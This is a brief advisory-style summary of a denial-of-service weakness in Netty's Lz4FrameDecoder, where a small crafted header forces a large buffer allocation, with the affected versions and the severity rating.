Netty’s Lz4FrameDecoder can pre‑allocate a ByteBuf sized according to the decompressed length of an incoming block, which can reach up to 32 MB. An attacker can trigger this allocation by sending a minimal 21‑byte header and a compressed payload, forcing the server to reserve the large buffer before decompression occurs. This behavior enables an attacker to deplete memory resources and disrupt the application’s availability without any code execution. The weakness is a Classic input validation error (CWE‑400) combined with a loss of resource controls (CWE‑770).

The vulnerability affects the Netty framework and its codec modules – io.netty:netty-codec, io.netty:netty-codec-compression, and netty:netty – in all releases older than 4.2.13.Final and 4.1.133.Final. Applications that use these versions and that employ the Lz4FrameDecoder are susceptible.

The CVSS score of 7.5 points to a high severity potential. Because no EPSS value is provided and the vulnerability is not listed in CISA KEV, the current known exploitation likelihood is undetermined, but the remote nature of the attack – any network connection to a Netty service – offers an ample attack surface. An attacker only needs to send a small crafted packet over the network to trigger the allocation, making the exploit straightforward to perform once the vulnerable version is identified.